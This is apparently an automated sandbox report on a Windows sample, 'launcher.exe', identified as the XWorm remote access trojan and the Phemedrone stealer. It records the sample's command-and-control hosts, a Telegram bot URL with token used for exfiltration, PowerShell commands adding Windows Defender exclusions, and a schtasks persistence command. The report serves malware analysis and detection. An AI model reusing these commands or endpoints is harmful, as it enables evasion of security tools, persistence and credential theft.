Overview

overview

10

Static

static

3

launcher.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    138s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-08-2024 16:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    launcher.exe

  • Size

    296KB

  • MD5

    7c43de969f5117062f9e2aff9c32b5c8

  • SHA1

    5887cd36102f856abf27e885c3c10e78ca8032a4

  • SHA256

    1c742cf055297ced1f29fa5779cfa2c9c53fc64d945d6edd7330beb5f0d88a72

  • SHA512

    30004800e2b002e4b1f1c6bbdc4fc8a00d5f56ddb859b1047fcce63dd14ca51cc3ef9d7599b440b9795e3587b6af333728d75bd37ae5004ef3189f530ef6eebd

  • SSDEEP

    6144:clGtyUXasfHznB3XjdOwkL1xOh9XLpf6TUIa1bq/KMw:cJUXBB3zEjLPUf6J

Score
10/10
phemedronexwormcredential_accessexecutionpersistenceratspywarestealertrojan

Malware Config

Extracted

Family

xworm

C2

127.0.0.1:19121

goods-flex.gl.at.ply.gg:19121
Attributes
  • Install_directory

    %Public%

  • install_file

    calc.exe

Extracted

Family

phemedrone

C2

https://api.telegram.org/bot6766891578:AAE47sIyviQ0_skRFQtvxeYcndg1C8RFyo4/sendDocument

Signatures

  • Detect Xworm Payload 2 IoCs
  • Phemedrone

    An information and wallet stealer written in C#.

    stealerphemedrone
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Command and Scripting Interpreter: PowerShell 1 TTPs 34 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 22 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\launcher.exe
    "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4392
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3204
    • C:\Users\Admin\AppData\Local\Temp\launcher.exe
      "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
      2⤵
      • Checks computer location settings
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4892
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2504
      • C:\Users\Admin\AppData\Local\Temp\launcher.exe
        "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
        3⤵
        • Checks computer location settings
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3332
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2712
        • C:\Users\Admin\AppData\Local\Temp\launcher.exe
          "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
          4⤵
          • Checks computer location settings
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3468
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:820
          • C:\Users\Admin\AppData\Local\Temp\launcher.exe
            "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
            5⤵
            • Checks computer location settings
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4080
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:636
            • C:\Users\Admin\AppData\Local\Temp\launcher.exe
              "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
              6⤵
              • Checks computer location settings
              • Suspicious use of AdjustPrivilegeToken
              PID:3332
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:3272
              • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                7⤵
                • Checks computer location settings
                • Suspicious use of AdjustPrivilegeToken
                PID:3440
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4372
                • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                  "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                  8⤵
                  • Checks computer location settings
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3244
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4352
                  • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                    "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                    9⤵
                    • Checks computer location settings
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1964
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
                      10⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1364
                    • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                      "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                      10⤵
                      • Checks computer location settings
                      PID:4428
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\launcher.exe'
                        11⤵
                        • Command and Scripting Interpreter: PowerShell
                        PID:748
                      • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                        "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                        11⤵
                          PID:244
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
                          11⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:2112
                        • C:\Users\Admin\AppData\Local\Temp\calcc.exe
                          "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
                          11⤵
                          • Executes dropped EXE
                          PID:4664
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
                          11⤵
                          • Command and Scripting Interpreter: PowerShell
                          PID:1348
                        • C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
                          "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
                          11⤵
                          • Executes dropped EXE
                          PID:2576
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
                        10⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4560
                      • C:\Users\Admin\AppData\Local\Temp\calcc.exe
                        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
                        10⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1152
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
                        10⤵
                        • Command and Scripting Interpreter: PowerShell
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4956
                      • C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
                        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
                        10⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4748
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2308
                    • C:\Users\Admin\AppData\Local\Temp\calcc.exe
                      "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
                      9⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4844
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3980
                    • C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
                      "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
                      9⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3348
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3876
                  • C:\Users\Admin\AppData\Local\Temp\calcc.exe
                    "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1364
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
                    8⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4356
                  • C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
                    "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
                    8⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3568
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4860
                • C:\Users\Admin\AppData\Local\Temp\calcc.exe
                  "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4204
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4956
                • C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
                  "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4816
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:2500
              • C:\Users\Admin\AppData\Local\Temp\calcc.exe
                "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:1080
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:4960
              • C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
                "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:3260
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:3432
            • C:\Users\Admin\AppData\Local\Temp\calcc.exe
              "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:4364
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious use of AdjustPrivilegeToken
              PID:2492
            • C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
              "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:1812
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1408
          • C:\Users\Admin\AppData\Local\Temp\calcc.exe
            "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2132
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1108
          • C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
            "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2020
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1460
        • C:\Users\Admin\AppData\Local\Temp\calcc.exe
          "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:400
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2212
        • C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
          "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4256
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4684
      • C:\Users\Admin\AppData\Local\Temp\calcc.exe
        "C:\Users\Admin\AppData\Local\Temp\calcc.exe"
        2⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3516
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\calcc.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3504
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'calcc.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2796
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\calc.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2224
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'calc.exe'
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1020
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "calc" /tr "C:\Users\Public\calc.exe"
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2144
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sync Center.exe'
        2⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5056
      • C:\Users\Admin\AppData\Local\Temp\Sync Center.exe
        "C:\Users\Admin\AppData\Local\Temp\Sync Center.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2484
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Checks SCSI registry key(s)
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:540
    • C:\Users\Public\calc.exe
      C:\Users\Public\calc.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2244
    • C:\Users\Public\calc.exe
      C:\Users\Public\calc.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1760
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:4104

      Network

      MITRE ATT&CK Enterprise v15

      Reconnaissance

      Resource Development

      Initial Access

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Persistence

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Defense Evasion

      Modify Registry

      1
      T1112

      Credential Access

      Credentials from Password Stores

      1
      T1555

      Credentials from Web Browsers

      1
      T1555.003

      Unsecured Credentials

      3
      T1552

      Credentials In Files

      3
      T1552.001

      Discovery

      Peripheral Device Discovery

      1
      T1120

      Query Registry

      3
      T1012

      System Information Discovery

      3
      T1082

      Lateral Movement

      Collection

      Data from Local System

      2
      T1005

      Command and Control

      Exfiltration

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\calcc.exe.log
        Filesize

        654B

        MD5

        2ff39f6c7249774be85fd60a8f9a245e

        SHA1

        684ff36b31aedc1e587c8496c02722c6698c1c4e

        SHA256

        e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

        SHA512

        1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\launcher.exe.log
        Filesize

        1KB

        MD5

        bb6a89a9355baba2918bb7c32eca1c94

        SHA1

        976c76dfbc072e405ce0d0b9314fe5b9e84cb1b2

        SHA256

        192fbb7f4d1396fd4846854c5472a60aa80932f3c754f2c2f1a2a136c8a6bb4b

        SHA512

        efdf0c6228c3a8a7550804ac921dfefc5265eb2c9bbf4b8b00cedd427c0a5adf610586b844ff444bd717abff138affcbe49632ce984cbffc5fa8019b4ba6ec0f

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        08988478a7d5d1b3f741dfeea71cb742

        SHA1

        35ab704090e5e550c0f2e0e97ad46a36888b59f7

        SHA256

        6cfa18f8bf36491206a1173d0bad3d399b861f144a49aa17854c5d7363d8041b

        SHA512

        1ed097fef2d542c378bd842b40efd275646f71309dd190fcf72c8830069ae31c157c7823cbc5344cf42711e79675f09da4b0876c882f28a289280158ffba3cab

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        10890cda4b6eab618e926c4118ab0647

        SHA1

        1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d

        SHA256

        00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14

        SHA512

        a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        9bc110200117a3752313ca2acaf8a9e1

        SHA1

        fda6b7da2e7b0175b391475ca78d1b4cf2147cd3

        SHA256

        c88e4bbb64f7fa31429ebe82c1cf07785c44486f37576f783a26ac856e02a4eb

        SHA512

        1f1af32aa18a8cbfcc65b0d4fb7e6ca2705f125eaa85789e981ee68b90c64522e954825abf460d4b4f97567715dfae8d9b0a25a4d54d10bc4c257c472f2e80fb

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        a915885ee305ddedc93eb017ee452c2d

        SHA1

        71fa8be50adff93c37d23eaffd359c7573d0fba6

        SHA256

        9148effd7f6028a5b2b17c03dea1c58d26d03f16795a51689ec783c3ab316f67

        SHA512

        cb29c8b2f0e033b86bf41e365bf0d934d0a844445fb52971a60579eac53d23eaad0bc776754e155b211e78c4089e31d37c96b1ab4ea5edb5480d66751d00c82d

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        944B

        MD5

        eb1ad317bd25b55b2bbdce8a28a74a94

        SHA1

        98a3978be4d10d62e7411946474579ee5bdc5ea6

